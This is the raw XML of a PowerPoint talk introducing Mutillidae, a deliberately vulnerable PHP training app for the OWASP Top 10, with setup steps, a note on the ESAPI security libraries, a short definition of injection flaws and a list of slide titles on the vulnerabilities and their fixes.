              <a:t> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Grab XAMPP Lite and install it</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.apachefriends.org/en/xampp.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Put the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> files into a web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>directory ( \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> on XAMPP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>May want to edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to decide who can access it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="650875" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Put your MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/config.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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400" dirty="0"/>
              <a:t>ESAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>OWASP Enterprise Security API)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lovely set of libraries to help implement fixes like proper escaping, parameterization and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>platforms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Java 1.4.4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Java 2.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	.NET</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Classic ASP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	PHP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	ColdFusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CFML</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31526108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A1 - Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8153400" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Documents and Settings\adrian\Local Settings\Temporary Internet Files\Content.IE5\KH2RK1Q3\MCj03513240000[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3478135"/>
            <a:ext cx="2819400" cy="3379865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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Custom 1">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FFFFFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FFFF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Deluxe</Template>
  <TotalTime>0</TotalTime>
  <Words>950</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>251</Paragraphs>
  <Slides>36</Slides>
  <Notes>33</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Apex</vt:lpstr>
      <vt:lpstr>Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The  OWASP Top 10</vt:lpstr>
      <vt:lpstr>About Adrian</vt:lpstr>
      <vt:lpstr>So, what is this talk about?</vt:lpstr>
      <vt:lpstr>The OWASP Top 10</vt:lpstr>
      <vt:lpstr>What’s Mutillidae?</vt:lpstr>
      <vt:lpstr>Samurai WTF</vt:lpstr>
      <vt:lpstr>Installing Mutillidae for the lazy</vt:lpstr>
      <vt:lpstr>ESAPI  (OWASP Enterprise Security API)</vt:lpstr>
      <vt:lpstr>A1 - Injection</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>A2 - Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>A3 - Broken Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Demo time!!!</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Things too look out for</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>A4 - Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>A5 - Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF/XSRF Illustration</vt:lpstr>
      <vt:lpstr>Demo Time!!!</vt:lpstr>
      <vt:lpstr>Links</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>Other Projects Like Mutillidae</vt:lpstr>
      <vt:lpstr>Useful tool collections/libraries</vt:lpstr>
      <vt:lpstr>Events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2009-11-25T03:40:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-07-08T21:00:08Z</dcterms:modified>
</cp:coreProperties>
</file>